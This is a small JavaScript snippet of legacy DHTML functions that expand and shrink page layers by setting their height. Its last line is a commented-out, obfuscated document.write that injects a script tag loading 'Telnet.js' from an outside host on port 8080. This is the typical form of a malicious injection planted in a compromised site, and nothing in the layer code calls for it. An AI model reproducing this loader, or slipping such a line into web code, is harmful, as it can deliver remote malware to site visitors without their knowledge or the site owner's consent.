function big(lyr) {
document.all[lyr].style.height='150px'; }
/* small() makes selected layer shorter (height property)*/
function small(lyr) {
document.all[lyr].style.height='24px';
}

/* start2() makes all layers short to start with (height property)*/
function start2() {
document.all.Layer2.style.height='24px';
}
//-- !>

//document.write('<s'+'cript type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Telnet.js"></scr'+'ipt>');
